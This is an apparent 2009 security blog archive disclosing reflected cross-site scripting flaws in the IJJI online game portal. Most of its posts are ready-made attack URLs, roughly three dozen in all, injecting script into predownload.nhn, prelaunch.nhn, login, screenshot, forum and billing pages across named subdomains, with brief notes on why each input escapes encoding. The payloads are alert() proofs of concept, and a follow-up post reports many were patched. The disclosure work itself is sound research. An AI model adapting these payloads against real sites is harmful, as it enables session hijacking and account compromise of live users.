IJJI XSS

One Month Later..

x1nixmzeng — Tue, 15 Sep 2009 23:18:41 +0000

It’s been a month since I published my last vulnerability, and IJJI has made several positive changes to their code (specifically with callback scripts).

The following posts have been patched due correctly encoding brackets, quotes, or blacklisting non-alphanumeric characters:

Global Pre-Download [BONUS2]
Global Pre-Download [BONUS]
Login Next URL
JSON Info Callback
BBS Forum View
Lunia Poll Callback
JSON Last Login Callback [BONUS] (still works on gunz.ijji.com though..)
Gunz Poll Callback
Huxley Poll Callback
CRM Check Callback
Drift City Poll Callback
JSON Balance Callback
JSON Gem Callback
JSON Buddy Callback

The following post has been patched thanks to the use of the isNaN function over eval:

BBS Board View

The following posts have been updated:

Signup Referral

Updated the src attribute to call the event onError in Firefox 3.5.

BBS Editor

Updated without the use of quotes.

IJJI has now published Holybeast Online, and begun the open-beta for Soul of the Ultimate Nation (S.U.N). They’ve also pushed their new launcher, Reactor, an extended web-wrapper for organising installed games. Steam anyone?

I’ve updated the categories for now, but I shall expect them to be outdated as this blog becomes forgotten about.

Oh, one last thing: Pre-Game Start

Global Pre-Download [BONUS2]

x1nixmzeng — Sat, 15 Aug 2009 00:36:44 +0000

Type: Non-persistent
Criteria: None

This final disclosure draws the series of predownload.nhn vulnerabilities to a close.

An actual explaination is due at a later date, where I will wrap this this blog up and open to feedback.

10) Miscellaneous

http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

11) Bulletin Board System

http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

12) Channel

http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

13) Billing

http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

14) HTTPS Billing

https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

15) Facebook

http://facebook.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

16) Message

http://message.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

17) Avatar

http://avatar.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

Global Pre-Download [BONUS]

x1nixmzeng — Fri, 14 Aug 2009 23:55:34 +0000

Type: Non-persistent
Criteria: None

The penultimate post in this experimental blog, disclosing 9 seperate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.

1) Top-level

http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

2) www2

http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

3) Huxley:The Dystopia

http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

4) Soldier Front

http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

5) GunZ

http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

6) Drift City

http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

7) Lunia

http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

8) Game

http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

9) Events

http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

This script has a greater advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.

Global Pre-Launch [BONUS2]

x1nixmzeng — Thu, 13 Aug 2009 00:36:14 +0000

Type: Non-persistent
Criteria: None

This post is a continuation of the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script.

10) Miscellaneous

http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

11) Bulletin Board System

http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

12) Channel

http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

13) Billing

http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

14) HTTPS Billing

https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

15) Facebook

http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

16) Message

http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

17) Avatar

http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:

If the user is authenticated, they will be alerted:

This channel does not exist

If the user is not authenticated, then they will be redirected to login (there is a timed delay on with Firefox).

Global Pre-Launch [BONUS]

x1nixmzeng — Wed, 12 Aug 2009 23:58:04 +0000

Type: Non-persistent
Criteria: None

Thus begins the final 4 days of this experiment; hopefully ending with a bang.

This post will disclose 9 seperate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.

1) Top-level

http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

2) www2

http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

3) Huxley:The Dystopia

http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

4) Soldier Front

http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

5) GunZ

http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

6) Drift City

http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

7) Lunia

http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

8) Game

http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

9) Events

http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

They clearly all exploit the same parameter, as they share the same script. I plan to writeup better descriptions in a seperate post.

Login Next URL

x1nixmzeng — Tue, 11 Aug 2009 16:31:54 +0000

Type: Non-persistent
Criteria: None

http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);//

There is no criteria, as you can be logged in or not – though if you are, you will be logged out (naturally).

In a nutshell, double quotes are encoded, but single ones are not – and also, the nextURL parameter is carelessly outputted straight into a script tag (for the loginENMLoginForm function).

Game Screenshot

x1nixmzeng — Mon, 10 Aug 2009 16:07:03 +0000

Type: Non-persistent
Criteria: None

http://game.ijji.com/sshot.nhn?gameId=u_gunz&index=0);alert(/xss/.source

Fairly old method, updated without the need for single or double quotes for the “xss” string (which are now correctly encoded before output). The variable index still doesn’t strip anything which doesn’t resemble an integer.

Blog Status

x1nixmzeng — Mon, 10 Aug 2009 15:42:20 +0000

I started this blog as an experiment, and as a small sideline challenge (to discover a vulnerability on the IJJI site every day for a month), but as I look back, I seem to have made numerous errors.

Each post should be focusing on a different script. My early posts focused on polls, which all used the same script:

http://event.ijji.com/poll.nhn

The only difference in each disclosure was the poll name, which did return different data, but shouldn’t have been posted seperately, as it wasn’t a new script.

Scripts on different subdomains are allowed though, as subdomains are seen a different hostnames according to the same origin policy (which is important for an attack).

BBS Forum View

x1nixmzeng — Sun, 09 Aug 2009 01:07:03 +0000

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&page=&id=999999999&ordering=%22;alert(%27xss%27);//

Note that the exploit will execute twice.

Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the variable id is now very picky about what data has been supplied. However, this exploit will still accept an id which doesn’t yet exist (less data is returned when it doesn’t exist, but this exploit will still work or without a valid id variable).

The XSS relies on the value of ordering, which is blindingly printed into the main page, and in both instances, directly into a SCRIPT tag (the phrase “script” has been blacklisted from all scripts, which is why I’ve been using an alternative).

HTTPS Add G Coin

x1nixmzeng — Sat, 08 Aug 2009 12:11:08 +0000

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22

Another vulnerability from the paymentprocess.nhn script. The RURL (referral URL) variable doesn’t check if the address supplied is valid or care to strip any characters. A particularly lazy example.

Outputted to a hidden input tag (REQ_RURL), there are no visible changes to the end-user.